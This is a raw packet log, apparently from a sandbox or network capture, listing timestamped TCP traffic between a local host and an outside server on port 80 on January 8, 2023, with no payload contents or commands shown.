Jan 8, 2023 16:15:22.866983891 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867013931 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867033005 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867043018 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867074966 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867095947 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867103100 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867130995 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867150068 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867160082 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867187977 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867213011 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867217064 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867247105 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867266893 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867275000 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867305994 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867331028 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867338896 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867372036 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867392063 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867398977 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867429972 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867451906 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867455959 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867485046 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867508888 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867512941 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867542028 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867562056 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867569923 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867602110 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867620945 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867630005 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867660046 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867679119 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867690086 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867719889 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867742062 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867748976 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867777109 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867804050 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867810011 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867832899 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867856026 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867862940 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867892981 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867913961 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867921114 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867950916 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.867965937 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.867979050 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868009090 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868029118 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.868037939 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868068933 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868089914 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.868098021 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868128061 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868149996 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.868155003 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868182898 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868205070 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.868211031 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868240118 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868262053 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.868268013 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868298054 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868316889 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.868326902 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868354082 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868385077 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868412018 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.868415117 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868443012 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.868447065 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868479013 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868505955 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.868509054 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868540049 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.868562937 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.886109114 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.892127037 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.892173052 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.892200947 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.892229080 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.892241955 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.892256975 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.892291069 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.892318010 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.892347097 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.892378092 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.892405987 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.892433882 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.892450094 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.892450094 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.892450094 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.892450094 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.892482996 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.893249035 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.893290043 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.893316984 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.893345118 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.893373013 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.893392086 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.893438101 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.913278103 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913322926 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913351059 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913378000 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913403988 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913408041 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.913434029 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913463116 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913489103 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.913490057 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913520098 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913547993 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913566113 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.913574934 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913604975 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913604021 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.913630962 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.913634062 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913661957 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913686037 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.913691044 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913719893 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913748026 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913748980 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.913777113 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913804054 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913813114 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.913832903 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913858891 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.913861036 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913892984 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913916111 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.913923025 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913954020 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.913983107 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914001942 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914012909 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914042950 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914042950 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914072990 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914097071 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914103031 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914134026 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914155960 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914163113 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914191961 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914211988 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914221048 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914249897 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914273024 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914278984 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914309025 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914335012 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914335966 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914366961 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914391994 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914395094 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914423943 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914446115 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914453030 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914474964 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914496899 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914518118 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914546013 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914566994 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914575100 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914604902 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914624929 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914633036 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914653063 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914663076 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914707899 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914716959 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914745092 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914773941 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914802074 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914803028 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914835930 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914853096 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914866924 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914896011 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914916992 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914925098 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914956093 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.914979935 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.914983034 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915014029 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915040970 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915041924 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915072918 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915095091 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915103912 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915132046 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915153980 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915160894 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915191889 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915210009 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915220022 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915249109 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915266991 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915277958 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915307045 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915332079 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915335894 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915365934 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915385962 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915395021 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915424109 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915448904 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915451050 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915489912 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915510893 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915520906 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915549994 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915577888 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915580034 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915608883 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915635109 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915637970 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915667057 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915692091 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915694952 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915724039 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915749073 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915750980 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915781021 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915808916 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915807962 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915838957 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915862083 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915868998 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915899038 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915923119 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915926933 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915956974 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.915980101 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.915987015 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916017056 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916043997 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916054964 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916071892 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916100025 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916102886 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916129112 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916153908 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916157007 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916186094 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916208029 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916215897 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916245937 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916273117 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916274071 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916304111 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916326046 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916332006 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916362047 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916385889 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916389942 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916419029 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916440010 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916448116 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916476965 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916503906 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916511059 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916533947 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916562080 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916568041 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916590929 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916618109 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916632891 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916649103 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916671038 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916699886 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916717052 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916728020 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916755915 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916762114 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916785002 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916800976 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916815042 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916842937 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916853905 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916872025 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916901112 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916903019 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916930914 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916955948 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.916960001 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.916990995 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917009115 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917018890 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917047024 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917067051 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917076111 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917105913 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917135954 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917135954 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917165041 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917188883 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917193890 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917224884 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917248011 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917253971 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917284966 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917310953 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917313099 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917345047 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917346001 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917370081 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917373896 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917402983 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917431116 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917433023 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917459965 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917484999 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917489052 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917519093 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917537928 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917546988 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917577982 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917598009 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917608023 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917634964 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917654037 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917665005 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917696953 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917723894 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917726994 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917754889 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917783022 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917805910 CET	49698	80	192.168.2.4	194.135.33.42
Jan 8, 2023 16:15:22.917810917 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917840004 CET	80	49698	194.135.33.42	192.168.2.4
Jan 8, 2023 16:15:22.917845964 CET	49698	80	192.168.2.4	194.135.33.42
